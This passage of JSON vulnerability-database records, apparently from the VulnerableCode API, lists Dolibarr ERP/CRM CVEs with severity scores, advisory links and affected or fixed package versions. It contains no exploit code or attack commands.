/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/en/security-advisories"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0054","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0054"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19212","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19212"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/455609?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4"}],"aliases":["CVE-2019-19212","GHSA-pm57-926c-28mr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gk4m-a13r-ekd6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/103590?format=json","vulnerability_id":"VCID-h4pr-kj49-xfhb","summary":"Dolibarr ERP & CRM v21.0.1 were discovered to contain a remote code execution (RCE) vulnerability in the User module configuration via the computed field parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-56588","reference_id":"","reference_type":"","scores":[{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.47215","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-56588"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-56588","reference_id":"CVE-2025-56588","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-56588"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-27hj-48r9-x2vx","reference_id":"GHSA-27hj-48r9-x2vx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-27hj-48r9-x2vx"},{"reference_url":"https://github.com/PhDg1410/Research","reference_id":"Research","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/"}],"url":"https://github.com/PhDg1410/Research"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34061?format=json","purl":"pkg:composer/dolibarr/dolibarr@21.0.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@21.0.3"}],"aliases":["CVE-2025-56588","GHSA-27hj-48r9-x2vx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h4pr-kj49-xfhb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/292753?format=json","vulnerability_id":"VCID-jmau-m9qu-s3h6","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18260","reference_id":"","reference_type":"","scores":[{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.4454","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18260"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18260","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18260"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-010","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-010"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/386571?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2017-18260","GHSA-9986-6m4g-25f6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jmau-m9qu-s3h6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/207322?format=json","vulnerability_id":"VCID-k1fz-zvje-17ga","summary":"Logic error in dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0174","reference_id":"","reference_type":"","scores":[{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.4792","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0174"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32"},{"reference_url":"https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0174","reference_id":"CVE-2022-0174","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0174"},{"reference_url":"https://github.com/advisories/GHSA-8qvx-f5gf-g43v","reference_id":"GHSA-8qvx-f5gf-g43v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8qvx-f5gf-g43v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/18669?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2022-0174","GHSA-8qvx-f5gf-g43v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k1fz-zvje-17ga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/161419?format=json","vulnerability_id":"VCID-kk1j-umud-wkdn","summary":"Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25710","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11253","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25710"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25710","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25710"},{"reference_url":"https://www.dolibarr.org","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org"},{"reference_url":"https://www.exploit-db.com/exploits/46095","reference_id":"46095","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.exploit-db.com/exploits/46095"},{"reference_url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip","reference_id":"dolibarr-8.0.4.zip","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip"},{"reference_url":"https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter","reference_id":"dolibarr-erp-crm-sql-injection-via-rowid-parameter","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter"},{"reference_url":"https://github.com/advisories/GHSA-xxxg-x793-7fq3","reference_id":"GHSA-xxxg-x793-7fq3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-xxxg-x793-7fq3"},{"reference_url":"https://www.dolibarr.org/","reference_id":"www.dolibarr.org","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.dolibarr.org/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/455555?format=json","purl":"pkg:composer/dolibarr/dolibarr@8.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.5"}],"aliases":["CVE-2019-25710","GHSA-xxxg-x793-7fq3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kk1j-umud-wkdn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/337019?format=json","vulnerability_id":"VCID-kxze-6h5v-mqg4","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"0.00171","scoring_system":"epss","scoring_elements":"0.3821","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25954"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/8cc100012d46282799fb19f735a53b7101569377","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/8cc100012d46282799fb19f735a53b7101569377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25954"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25954"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/391466?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.5"},{"url":"http://public2.vulnerablecode.io/api/packages/19977?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"